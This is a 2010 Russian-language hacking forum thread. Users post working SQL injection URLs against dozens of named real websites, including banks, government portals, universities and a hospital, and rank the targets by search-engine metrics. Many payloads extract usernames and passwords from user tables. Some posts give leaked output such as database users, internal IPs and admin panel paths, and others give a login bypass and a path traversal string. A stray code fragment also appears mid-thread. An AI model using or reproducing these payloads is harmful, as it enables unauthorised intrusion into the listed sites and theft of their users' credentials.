http://www.glavmetall.ru/board2/ind.php?pn=3&id_typ=-18+union+select+1,2,3,4,5,6,concat_ws(0x3a,databas e(),user(),version()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
wwwglavmetallru:glavmeta@localhost:4.1.25-log
тИЦ: 10
Мор0к said:
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
Code:
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,concat_ws%280x3a,us er_login,user_password%29,27+from+u217628_econf.fo rum_users--+
Это из таблы
Code:
u217628_econf:forum_users
Где логиница
-PRIVAT-
12.08.2010, 10:54
http://liberot.ru/autor.php?id=2&autor=56&poem=482+union+select+1,2,3,4 +--+
ТИЦ 10
http://liberato.ru/autor.php?id=12+union+select+1,2,3,4--
ТИЦ 20 PR 1
http://reading-hall.ru/autor.php?id=-86+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2+f rom+information_schema.tables+limit+22,1 --
ТИЦ 30 PR 4
http://libavtograd.tgl.ru/autor.php?id=-78+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9+from+information_schema.tables+--
ТИЦ 500 PR 4
http://www.mg-photo.ru/school/konkurs/autor.php?id=-257+union+select+1,2,3,4,5,6+--+
ТИЦ 30 PR 2
http://www.boerboel-club.ru/document.php?id=-48+union+select+1,concat_ws%280x3a,user_id,user_na me,user_password%29,3,4,5,6,7,8,9+from+CPG_users--
ТИЦ 80 PR 2
http://www.garantcentre.ru/document.php?id=23126+union+select+1,2,3,4,5--
ТИЦ 10
http://www.reznik.pri.ee/document.php?id=100+union+select+1%20+--+
ТИЦ 30 PR 2 Страница Дмитрия Резника
http://www.firmagarant.ru/document.php?id=2243+union+select+1,2,3,4,5--
PR 2
http://www.mesta-vstrech.ru/mesto.php?id=-255+union+select+1,2,3,4,5,6,group_concat%28table_ name%29,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6+from+information_schema.tables--
ТИЦ 20 PR 2
http://www.pnzinfond.ru/mesto.php?id=-125+union+select+1,2,3,4,5,6,table_name,8+from+inf ormation_schema.tables+limit+3111%20+--+
PR 4
http://www.desinfinator.com/show_news.php?id=-20+union+select+1,2,3,4,5 --
ТИЦ 10 PR 4
http://www.comelsoft.com/show_news.php?id=32+union+select+1,2,3+--+
ТИЦ 20 PR 4
http://www.burgasinfo.com/show_news.php?id=-23200+order+by+1+--+
ТИЦ 50 PR 5
http://www.paktribune.com/news/print.php?id=-183128+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,us(),8,9,0,1,2,3,4,5,6,7,8,9 --
ТИЦ 80 PR 5
PRosTo_LEva
12.08.2010, 11:18
shuba said:
Мор0к said:
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
Code:
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,concat_ws%280x3a,us er_login,user_password%29,27+from+u217628_econf.fo rum_users--+
Это из таблы
Code:
u217628_econf:forum_users
Где логиница
http://rae.ru/snt/admin/
http://www.rae.ru/forum2010/admin
http://rae.ru/phpinfo.php - админ кабЭ намекает
" if author else f"
shuba said:
Мор0к said:
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
Code:
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,concat_ws%280x3a,us er_login,user_password%29,27+from+u217628_econf.fo rum_users--+
Это из таблы
Code:
u217628_econf:forum_users
Где логиница
http://rae.ru/snt/admin/
http://www.rae.ru/forum2010/admin
http://rae.ru/phpinfo.php - админ кабЭ намекает
http://www.telbru.com.bn/news_item.php?newsid=-123+union+select+1,group_concat(username,0x3a,pass word),3,4,5+from+pusers--
PR-5
------
http://www.post.gov.bn/news_detail.php?newsid=-15+union+select+1,2,3,4
PR-6
ProGamer
13.08.2010, 22:43
http://www.erostory.ru/comment.php?ID=1+union+select+1,2,3,table_name,5+f rom+information_schema.tables--
5.0.86
Глушим...
PR6
http://www.enba-lyon.eu/conferences/fiche.php?a=01&id=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22/*
Database Version: 5.0.32-Debian_7etch12-log
Database name: panopticon
User name: panopticon@91-121-40-219.ovh.net
PR4
http://www.prague-information.eu/index.php?act=lst_nd&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,concat(0x3a3a,user(),0x3a3a ,version(),0x3a3a,database(),0x3a3a),41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58/*
Database Version: 5.0.32-Debian_7etch12-log
Database name: gpragueidb
User name: gpraguei@localhost
http://www.us.szc.pl/main.php/nro?xml=load_page&st=19226+or+(3,3)=(select+count(0),concat((select+ column_name+from+information_schema.columns+where+ table_name=(select+table_name+from+information_sch ema.tables+limit+17,1)+limit+2,1),floor(rand(0)*2) )from(information_schema.tables)+group+by+2)--+
-->
http://www.us.szc.pl/main.php/nro?xml=load_page&st=19226+or+(1,1)=(select+count(0),concat((select+ concat(ad_login,char(58),ad_haslo)+from+edu_admini stratorzy+limit+0,1),floor(rand(0)*2))from(informa tion_schema.tables)+group+by+2)--+
PR-6
p/s
этот изврат сработал на локалке,а вот сайт умер
select column_name from information_schema.columns where table_name=(select table_name from information_schema.columns where column_name like '%Col_string%' limit 0,1) limit 0,1;
http://www.sigmaco.ru/news.php?id=-7+union+select+1,2,version(),user()
тИЦ 20
PR 1
http://www.sn-center.ru/news.php?id=7+union+select+version(),2
----
смотреть Title
тИЦ 20
PR 1
----
http://gambia.gtbank.com/news.php?id=7+and+1=0+union+select+1,concat_ws(0x3 a,id,username,password),3,4,5+from+users--
Какой-то банк
PageRank 5/10
----
http://www.cnsresearchinstitute.com/news.php?id=7+union+select+1,version(),3,user(),5, 6,7,8,9,10+--+
сбоку
PageRank 4/10
Code:
http://www.svrauto.ru/index.php?pageId=31&comp=-270+and+1=2+union+select+1,2,concat_ws(version(),u ser(),database(),@@version_compile_os)--
svrauto@localhost5.0.45-logsvrauto5.0.45-logredhat-linux-gnu
DezMond™
15.08.2010, 14:25
Сборочка)
eurotel.by ТИЦ: 200 PR: 4
Code:
http://eurotel.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1936'+union+select+1,2,user(),4,5,6,7,8+--+
mobilife.of.by ТИЦ: 200 PR: 3
Code:
http://mobilife.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2383'+union+select+1,2,user(),4,5,6,7,8+--+
anriauto.by ТИЦ: 200 PR: 4
Code:
http://anriauto.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2276'+union+select+1,2,user(),4,5,6,7,8+--+
interio-mebel.by ТИЦ: 200 PR: 5
Code:
http://interio-mebel.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2222'+union+select+1,2,user(),4,5,6,7,8+--+
100tovarov.by ТИЦ: 20 PR: 4
Code:
http://www.100tovarov.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-793'+union+select+1,2,user(),4,5,6,7,8+--+
repoffice.info
Code:
http://www.repoffice.info/index.php?id=3&row=-14+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,p assword),7,8+from+users+limit+1,1+--+
autoshopping.by ТИЦ: 10 PR: 4
Code:
http://www.autoshopping.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2016'+union+select+1,2,user(),4,5,6,7,8+--+
krestikov.net ТИЦ: 30 PR: 2
Code:
http://www.krestikov.net/blog/index.php?id=3&post=../../%00
bvics.org
Code:
http://bvics.org/cms/articles/popArticle.php?id=-5+union+select+1,2,3,4,5,concat_ws(0x3a3a,username ,password),7+from+user+--+
anriauto.by ТИЦ: 200 PR: 4
Code:
http://anriauto.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2057'+union+select+1,2,user(),4,5,6,7,8+--+
swapandtravel.com ТИЦ: 0 PR: 3
Code:
http://www.swapandtravel.com/home-exchange-item/Apartment/Canada/?noOffre=-362+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a3a,user,pass,typeAbonnement),0x71),0x71),3, unhex(hex(user)),5+from+tMembres+--+
apostilando.com ТИЦ: 0 PR: 4
Code:
http://www.apostilando.com/download.php?cod=-92+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,cod _usuario,nome_usuario,e_mail_usuario,senha),9,10,1 1,12,13,14,15,16,17+from+tab_usuarios+limit+0,1+--+&categoria=Word
hausparzival.com ТИЦ: 0 PR: 2
Code:
http://www.hausparzival.com/index.php?page=gallery&gpage=b&list=-1+union+select+concat_ws(0x3a3a,sitenaam,mysqluser ,mysqlpass)+from+beheerindex+--+
igrushka.by ТИЦ: 10 PR: 4
Code:
http://www.igrushka.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-831'+union+select+1,2,user(),4,5,6,7,8+--+
svisloch.by ТИЦ: 200 PR: 3
Code:
http://svisloch.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1630'+union+select+1,2,user(),4,5,6,7,8+--+
snugpak.com ТИЦ: 10 PR: 4
Code:
http://www.snugpak.com/index.php?MenuID=93-107&ItemID=-84+union+select+1,2,concat_ws(0x3a3a,username,pass word,Email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71+from+Users+--+
pcstore.by
Code:
http://pcstore.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2355'+union+select+1,2,user(),4,5,6,7,8+--+
studiopel.com
Code:
http://www.studiopel.com/site/index.php?id=8+union+select+1,2,3,concat_ws(0x3a3a ,user_name,password),5,6+from+user+--+&page=Prodotti#content
4baby.by ТИЦ: 200 PR: 0
Code:
http://4baby.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2290'+union+select+1,2,user(),4,5,6,7,8+--+
unfallklinik-frankfurt.de ТИЦ: 0 PR: 4
Code:
http://www.unfallklinik-frankfurt.de/index.php?cid=-278+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,name,19,20,21,22,23,24,25,26+from+user+--+
myrmica.by ТИЦ: 200 PR: 3
Code:
http://myrmica.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1635'+union+select+1,2,user(),4,5,6,7,8+--+
globalgroup.by ТИЦ: 200 PR: 3
Code:
http://globalgroup.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1887'+union+select+1,2,user(),4,5,6,7,8+--+
specialtynurseries.org ТИЦ: 10 PR: 4
Code:
http://specialtynurseries.org/nursery.php?number=-11+union+select+1,2,database(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41+from+inform ation_schema.tables+--+
hozmag.by ТИЦ: 200 PR: 0
Code:
http://hozmag.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2285'+union+select+1,2,user(),4,5,6,7,8+--+
dvd-world.by ТИЦ: 0 PR: 2
Code:
http://dvd-world.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1398'+union+select+1,2,user(),4,5,6,7,8+--+
sudantv.net ТИЦ: 10 PR: 6
Code:
http://www.sudantv.net/islammag/submagadd.php?yy=-12061+union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
7system.ru ТИЦ: 10 PR: 2
Code:
http://www.7system.ru/news.php?id=-36+union+select+1,2,table_name,4,5,6,7+from+inform ation_schema.tables+--+
beri.by ТИЦ: 200 PR: 3
Code:
http://beri.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-832'+union+select+1,2,user(),4,5,6,7,8+--+
belkoopstrah.by ТИЦ: 40 PR: 4
Code:
http://www.belkoopstrah.by/index.php?parent=0&issue_id=-2710+union+select+1,2,3,4,5,6,7,8,9+/*+
mpz.com.by ТИЦ: 325 PR: 4
Code:
http://mpz.com.by/ru/news.php?id=-67'+union+select+1,2,3,user(),5+--+
melford.co.uk ТИЦ: 0 PR: 5
Code:
http://www.melford.co.uk/index.php?t=details&sid=%5C&&id=-174+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+--+
interlink.ru ТИЦ: 230 PR: 3
Code:
http://www.interlink.ru/items.php?cmd_il=-899567+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
amd.by ТИЦ: 200 PR: 4
Code:
http://www.amd.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1650'+union+select+1,2,user(),4,5,6,7,8+--+
fotiki.by ТИЦ: 10 PR: 4
Code:
http://www.fotiki.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1223'+union+select+1,2,user(),4,5,6,7,8+--+
jle.org.uk
Code:
http://www.jle.org.uk/photo.php?id=-7507+union+select+1,2,3,4+--+
sabaya.org ТИЦ: 0 PR: 5
Code:
http://www.sabaya.org/atemplate.php?id=-16+union+select+1,2,3,concat_ws(0x3a3a,username,pa ssword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+fr om+users+--+
atra.org ТИЦ: 10 PR: 5
Code:
http://www.atra.org/issues/index.php?issue=-7491+union+select+1,2,3,passwd,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49+from+users+--+
liammcarthurmsp.org.uk ТИЦ: 10 PR: 4
Code:
http://www.liammcarthurmsp.org.uk/press-releases.php?detail=y&id=-664+union+select+1,user(),3,4,5+--+
macroeng.com ТИЦ: 0 PR: 4
Code:
http://www.macroeng.com/press-releases.php?display=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+use rsgroups+--+&cache=1'&record=13'
e-patent.ru ТИЦ: 40 PR: 3
Code:
http://www.e-patent.ru/cgi-bin/news.cgi?id=-717'+union+select+1,2,3,4,5,6,7+--+
bnb.ch ТИЦ: 20 PR: 6
Code:
http://www.bnb.ch/index.php?p=page&id=-1364++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws (0x3a3a,ID,bnbid,pw),29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71, 72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88 ,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103, 104,105,106,107,108,109,110,111,112,113,114,115,11 6,117,118,119,120,121,122,123,124,125,126,127,128, 129,130,131,132,133,134,135,136,137,138,139,140,14 1,142,143,144,145,146,147,148,149,150,151,152,153, 154,155,156,157,158,159,160,161,162,163,164,165,16 6,167,168,169,170,171,172,173,174+from+motdepasse+--+&PHPSESSID=fbf44cc0ba0c9ef277401af0c09666ea
molchanova.ru ТИЦ: 40 PR: 3
Code:
http://www.molchanova.ru/parser.php?p_id=21&r_id=-88'+union+select+1,version(),3,4,5+--+
feldmanshepherd.com ТИЦ: 10 PR: 4
Code:
http://www.feldmanshepherd.com/press-releases.php?action=view&id=-121'+union+select+1,concat_ws(0x3a3a,username,PASS WORD,email,type,typeadmin),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+from+news_users+limit+1,1+--+
offtechno.com ТИЦ: 10 PR: 4
Code:
http://www.offtechno.com/releases.php?rel=-59+union+select+1,2,3,table_name,5+from+informatio n_schema.tables+--+
natalieimbruglia.com ТИЦ: 30 PR: 5
Code:
http://www.natalieimbruglia.com/releases.php?id=-4'+union+select+1,2,3,4,5,6,unhex(hex(user())),8,9 ,10,11,12,13,14+--+
ekm.ee ТИЦ: 70 PR: 6
Code:
http://www.ekm.ee/rus/kalender.php?date=2010-08-19&d_fili=3+union+select+1,2,3,4,5,6,unhex(hex(databa se())),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43+--+
elsemanario.com.mx ТИЦ: 10 PR: 4
Code:
http://www.elsemanario.com.mx/news/news_display.php?story_id=967'+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,user_name ,password,editor_house_id,permission_level),15,16, 17,18,19,20,21,22,23+from+admin_user_login+--+
ЗЫ Баянов нет!
сайт по продаже вертолетов
тИЦ — 90
PR — 3
Code:
http://www.galsaero.ru/library/archive/?ArticleId=-8+union+select+1,2,3,4,5,user(),7+--+
PR 3
Code:
http://tignon.andre.free.fr/report.php?id=-663+union+select+1,concat_ws(0x2b,version(),user() ,@@version_compile_os),3,4+--+
5.0.83+tignon.andre@172.20.245.54+unknown-linux-gnu
PR 4
Code:
http://www.age.fr/fr/module.php?ID=-15+union+Select+1,2,3,4,concat_ws(0x2b,version(),u ser(),@@version_compile_os),6,7,8,9,10,11,12,13,14 ,15,16,17+--+
5.0.90-log+agehksfbmysql@10.0.62.101+pc-linux-gnu
PR 3
Code:
http://playmate.elles-se-mettent-nues-pour-nous.fr/playmate.php?id=-111+union+select+1,2,3,4,5,6,concat_ws(0x2b,versio n(),user(),@@version_compile_os),8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32+--+
4.0.27-standard+dbo248651352@localhost+pc-linux-gnu
PR 7
Code:
http://cedric.cnam.fr/AfficheActivite.php?id=-34+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(ve rsion()+using+latin1),13+--+
4.1.10a
5.1.39-log:davidsmall:brakeman@humantorch.dreamhost.comc-linux-gnu
Google PageRank 5/10
http://davidsmallbooks.com/news_display.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),5+--+
Продолжу тему авиации-теперь сайт по продаже самолетов
Code:
http://www.businessair.ru/info/news.php?id=-375+union+select+1,user(),3,4,5,6+--+
http://skydot.lanl.gov
Sky Database for Objects in Time-Domain
Это первая версия сайта, которая обеспечит интерактивный доступ к различным астрономическим наборов данных, связанные со временем работы домена. Он был задуман в рамках и вырос из RAPTOR проекта. Мы надеемся, что постепенно расширять охват данных, а также возможности skydot и в конечном итоге превратить его в удобный инструмент для получения, оценки и анализа данных, даже небо мониторинга. Проверить наличие обновлений.
для получения данных используют SQL запросы(точнее только select)...
http://skydot.lanl.gov/nsvs/nsvs.php
без комментариев...
SofiaLoar
16.08.2010, 06:07
http://teh-rezina.ru/?id=999+union+select+1,user(),version(),4,5,6
5.0.51a-24+lenny1
trezina@localhost
----------
http://oleg-stecenko.biz.ua/index.php?show=product&cat=135&im=&par3=&par4=&par2=&pid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,user() ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35
oleg@localhost:5.0.24
[Feldmarschall]
16.08.2010, 06:33
Bank of Afghanistan
Code:
http://www.centralbank.gov.af/CompleteNewsDescription.php?NewsId=-13+union+ALL+select+1,concat_ws(0x3a,version(),dat abase(),user()),3,4,5--
---
Version:5.0.91-community
Database: cbank_dabwebsite
User: cbank_root@localhost
---
п.с ..за мной выехали ..ы
-PRIVAT-
16.08.2010, 13:20
http://www.sd-info.ru/self.php?id=-18+union+select+1,2,3 +--+
ТИЦ 10 PR 3
Code:
http://www.moodiereport.com/category.php?id=-31+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280 x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723 E%29,5,6,7,8,9,10,11,12,13+from+information_schema .columns+where+column_name+like+0x257061737325+or+ column_name+like+0x25702577256425--+
PR 3
Code:
http://www.worldnet-intl.com/services.php?id=3&&s=-9%20Union%20Select%201,database%28%29,3,4,5,6,7,8, 9,10%20--
Version = 5.0.51a-24+lenny4
Database = worldnet_db
User = worldnet_user@dedi1146.nur4.host-h.net
Code:
http://www.franchisetoown.com/franchise_detail.php?id=412+and+1=0+%20Union%20Sel ect%20%201,2,3,4,5,6,7,8,9,10,11,12,13,UNHEX%28HEX %28version%28%29%29%29,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43%20--
Version = 5.0.41-community-log
User = franchi_fto@98.130.2.1
Database = franchi_fto
Code:
http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat%28username,0x3a,passwor d%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20 jos_users%20limit%200,1--
Code:
http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17%20from%20jos_users%20limit%200,1--
Version: bd_puntoedu
Database: 5.0.77
Username: ]puntoedu_user@localhost
Google PR: 7
Второй пароль на админке...
Code:
http://www.localfirstaz.com/directory/view-cat.php?id=-23+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280 x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723 E%29+from+information_schema.columns+where+column_ name+like+0x257061737325+or+column_name+like+0x257 02577256425--+
http://mombaby.med.unc.edu/index.php?c=2&s=58&p=-333+union/*ii*/select+1,2,3,concat_ws(0x3a,user(),version(),datab ase()),5,6,7,8,9+from+information_schema.columns--
http://www.corpusgallery.com/exhibitions.php?id=-21'+union+select+1,2,3,version(),5,6,7/*
http://www.digitalcarversguild.com/plugin.php?ProductId=-18+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21--
http://www.maverickentertainment.cc/filmdetail.php?ProductID=724+and+ascii(lower(subst ring(user(),1,1)))=109
http://www.eonclash.com/ViewProduct.php?ProductID=-26+union+select+1,2,concat(username,char(58),user_ password),4,5,6,7,8+from+users
PR5
http://www.rtuni.org/extendedschools/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,version(),9--
Database Version: 5.0.90-community
Database name: bbritton_rtu
User name: bbritton_root@localhost
http://www.positivenetworks.com/page.php?pageID=3'+or+(1,1)=(select+count(0),conca t((select+table_name+from+information_schema.table s+where+table_name=(select+table_name+from+informa tion_schema.tables+where+table_rows>ascii(lower(substring(version(),1,1)))limit+0,1)+l imit+0,1),floor(rand(0)*2))from(information_schema .tables)+group+by+2)--+
Code:
http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=-336+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30--
Version: 5.0.22-Debian_0ubuntu6.06.2-log
Database: personal
Username: inb@localhost
Google PR: 5
-PRIVAT-
17.08.2010, 12:02
http://www.erreh.it/oldnews.php?ID=-4+union+select+version%28%29%20+--+
PR 1
http://www.faeton.spb.ru/news.php?menuitem=-115+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4 --
ТИЦ 60 PR 3
http://www.tennisinfo.ru/news.php?newsid=-7036+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 +--+
ТИЦ 80 PR 3
http://topblogi.ru/news.php?newsid=-23+union+select+1,2,3,4,5,6,7,8,9,10 --
ТИЦ 10 PR 4
http://www.aero-premium.ru/news.php?newsid=-90+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4%20--
ТИЦ 80 PR 2
http://www.rsijournal.net/time.php?id=-25+union+select+group_concat%28table_name%29+from+ information_schema.tables%20+--+
PR 3
http://sts-austria.com/tovar.php?tovarid=-27+union+select+1,2,3,4,5%20--
ТИЦ 20 PR 2
Шоп
http://youronesourcefitness.com/trainers.php?id=30+union+select+concat_ws(0x3a,@@v ersion,@@version_compile_os,@@version_comment,@@ve rsion_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1,2
http://www.limelight-software.com/article.php?id=-59+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),1),1),4,5,6,7
http://www.yangdentalgroup.net/nl/article.php?id=1512;select+version()::int,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null&type=col
http://www.unitedpurpose.org/archive/article.php?id=100+union+select+1,2,3,4,5,6,group_ concat(table_name),8,9,10,11,12,13+from+informatio n_schema.`tables`+where+table_schema=database()
http://www.duesseldorf.feg.de/static/sebalu2/article.php?id=-48+union+select+1,2,3,4,5,6,7,8,9
http://www.israel-diaspora.info/article.php?id=-853+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13
http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid=(select+top+1+table_name+ from+information_schema.tables)&TypeOfPage=2
http://www.musicforpercussion.com/php/NewsDetail.php?ID=-130+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14--
http://www.odessachamber.com/newsdetail.php?id=14'+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+
http://www.dkggroup.com/newsdetail.php?id=165+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+
http://www.tango04.com/news/newsdetail.php?id=-361+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13
http://www.dutchtub.com/english00/newsdetail.php?id=-207+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34&titel=eco_gadget_of_the_year!
http://www.marmoon.com/games.php?id=-437+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13
http://www.dakamericas.com/newsdetail.php?id=19'+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+
http://www.bathfringe.co.uk/page.php?pageid=38+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31&PHPSESSID='2ebe0d1ced95240449e5f9ec7bb9219c
Code:
http://www.iccu.sbn.it/genera.jsp?id=-1+or+(select+count(*)+from+(select+1+union+select+ 2+union+select+3)x+group+by++concat(mid(version(), 1,63),+floor(rand(0)*2)))--+
PR - 7
ps. кому не лень, можете и докрутить ;-)
Небольшой хостинг картинок
Code:
http://pixca.ru/login.php
sql inj в POST данных. логика запроса SELECT * FROM ??? WHERE (login = '#login#') and (password = '#password#').
можно зайти под любым пользователем : D
l: #login#') or 1=1#
p: put smth here
http://www.eonclash.com/ViewProduct.php?ProductID=27+and+substring(version (),1,1)=4
